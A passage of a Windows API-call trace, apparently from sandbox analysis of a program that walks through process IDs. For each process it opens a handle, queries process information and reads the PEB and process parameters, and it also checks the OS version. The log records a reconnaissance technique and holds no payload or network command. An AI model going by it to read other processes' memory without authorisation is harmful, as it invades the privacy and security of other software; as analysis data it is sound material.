[0403.797] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0403.798] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0403.798] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0403.798] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x571ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0403.799] malloc (_Size=0x68) returned 0x2c08e0
[0403.799] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x57274e, lpBuffer=0x2c08e0, nSize=0x66, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c08e0*, lpNumberOfBytesRead=0x0) returned 1
[0403.799] free (_Block=0x2c08e0)
[0403.800] CloseHandle (hObject=0x240) returned 1
[0403.801] _ui64tow (_Value=0xbc4, _Buffer="3004", _Radix=10) returned="3012"
[0403.806] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="3012") returned 4
[0403.808] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pa䍐\x12") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0403.808] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0403.839] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xbc4) returned 0x240
[0403.840] GetLastError () returned 0x0
[0403.840] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0403.840] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0403.840] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0403.840] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x432910, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0403.841] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x4326e4, lpBuffer=0x12dd100, nSize=0x68, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0403.842] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0403.847] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0403.847] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0403.847] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x431ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0403.847] malloc (_Size=0x70) returned 0x2c4740
[0403.847] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x43274c, lpBuffer=0x2c4740, nSize=0x6e, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c4740*, lpNumberOfBytesRead=0x0) returned 1
[0403.848] free (_Block=0x2c4740)
[0403.849] CloseHandle (hObject=0x240) returned 1
[0403.850] _ui64tow (_Value=0xbcc, _Buffer="3012", _Radix=10) returned="3020"
[0403.854] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="3020") returned 4
[0403.856] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0403.856] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0403.879] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xbcc) returned 0x240
[0403.879] GetLastError () returned 0x0
[0403.879] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0403.879] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0403.880] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0403.880] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x3f2900, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0403.880] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x3f26ee, lpBuffer=0x12dd100, nSize=0x60, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0403.881] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0403.882] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0403.883] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0403.883] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x3f1ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0403.883] malloc (_Size=0x68) returned 0x2c08e0
[0403.883] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x3f274e, lpBuffer=0x2c08e0, nSize=0x66, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c08e0*, lpNumberOfBytesRead=0x0) returned 1
[0403.883] free (_Block=0x2c08e0)
[0403.884] CloseHandle (hObject=0x240) returned 1
[0403.885] _ui64tow (_Value=0xbd4, _Buffer="3020", _Radix=10) returned="3028"
[0403.890] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="3028") returned 4
[0403.891] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pa䍐\x12") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0403.891] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0403.917] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xbd4) returned 0x240
[0403.917] GetLastError () returned 0x0
[0403.917] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0403.917] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0403.918] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0403.918] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x1328f0, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0403.918] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x1326e8, lpBuffer=0x12dd100, nSize=0x5a, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0403.919] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0403.920] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0403.920] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0403.921] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x131ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0403.921] malloc (_Size=0x62) returned 0x2c0790
[0403.921] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x132742, lpBuffer=0x2c0790, nSize=0x60, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c0790*, lpNumberOfBytesRead=0x0) returned 1
[0403.921] free (_Block=0x2c0790)
[0403.922] CloseHandle (hObject=0x240) returned 1
[0403.923] _ui64tow (_Value=0xbdc, _Buffer="3028", _Radix=10) returned="3036"
[0403.928] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="3036") returned 4
[0403.929] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pa䍐\x12") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0403.929] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0403.953] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xbdc) returned 0x240
[0403.954] GetLastError () returned 0x0
[0403.954] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0403.954] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0403.954] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0403.954] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x502930, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0403.954] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x5026f4, lpBuffer=0x12dd100, nSize=0x6c, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0403.956] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0403.957] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0403.957] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0403.957] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x501ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0403.957] malloc (_Size=0x74) returned 0x2c4740
[0403.957] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x502760, lpBuffer=0x2c4740, nSize=0x72, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c4740*, lpNumberOfBytesRead=0x0) returned 1
[0403.958] free (_Block=0x2c4740)
[0403.959] CloseHandle (hObject=0x240) returned 1
[0403.960] _ui64tow (_Value=0xbe4, _Buffer="3036", _Radix=10) returned="3044"
[0403.964] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="3044") returned 4
[0403.965] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0403.965] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0403.989] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xbe4) returned 0x240
[0403.989] GetLastError () returned 0x0
[0403.989] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0403.989] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0403.990] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0403.990] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x2428f0, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0403.990] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x2426e4, lpBuffer=0x12dd100, nSize=0x5a, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0403.992] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0403.993] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0403.993] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0403.993] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x241ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0403.993] malloc (_Size=0x62) returned 0x2c0790
[0403.994] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x24273e, lpBuffer=0x2c0790, nSize=0x60, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c0790*, lpNumberOfBytesRead=0x0) returned 1
[0403.994] free (_Block=0x2c0790)
[0403.995] CloseHandle (hObject=0x240) returned 1
[0403.995] _ui64tow (_Value=0xbec, _Buffer="3044", _Radix=10) returned="3052"
[0404.000] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="3052") returned 4
[0404.001] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0404.001] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0404.027] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xbec) returned 0x240
[0404.027] GetLastError () returned 0x0
[0404.027] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0404.027] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0404.027] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0404.027] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x4328c0, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0404.028] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x4326de, lpBuffer=0x12dd100, nSize=0x4c, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0404.029] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0404.030] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0404.030] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0404.030] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x431ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0404.030] malloc (_Size=0x54) returned 0x2b9ad0
[0404.030] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x43272a, lpBuffer=0x2b9ad0, nSize=0x52, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2b9ad0*, lpNumberOfBytesRead=0x0) returned 1
[0404.030] free (_Block=0x2b9ad0)
[0404.031] CloseHandle (hObject=0x240) returned 1
[0404.032] _ui64tow (_Value=0xbf4, _Buffer="3052", _Radix=10) returned="3060"
[0404.037] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="3060") returned 4
[0404.038] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0404.038] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0404.061] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xbf4) returned 0x240
[0404.061] GetLastError () returned 0x0
[0404.061] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0404.061] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0404.062] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0404.062] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x6228d0, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0404.062] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x6226da, lpBuffer=0x12dd100, nSize=0x54, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0404.063] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0404.065] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0404.065] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0404.065] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x621ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0404.065] malloc (_Size=0x5c) returned 0x2c0790
[0404.065] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x62272e, lpBuffer=0x2c0790, nSize=0x5a, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c0790*, lpNumberOfBytesRead=0x0) returned 1
[0404.066] free (_Block=0x2c0790)
[0404.066] CloseHandle (hObject=0x240) returned 1
[0404.068] _ui64tow (_Value=0xbfc, _Buffer="3060", _Radix=10) returned="3068"
[0404.072] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="3068") returned 4
[0404.073] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0404.073] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0404.094] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xbfc) returned 0x240
[0404.094] GetLastError () returned 0x0
[0404.094] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0404.094] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0404.095] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0404.095] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x3d28d0, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0404.095] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x3d26de, lpBuffer=0x12dd100, nSize=0x56, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0404.096] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
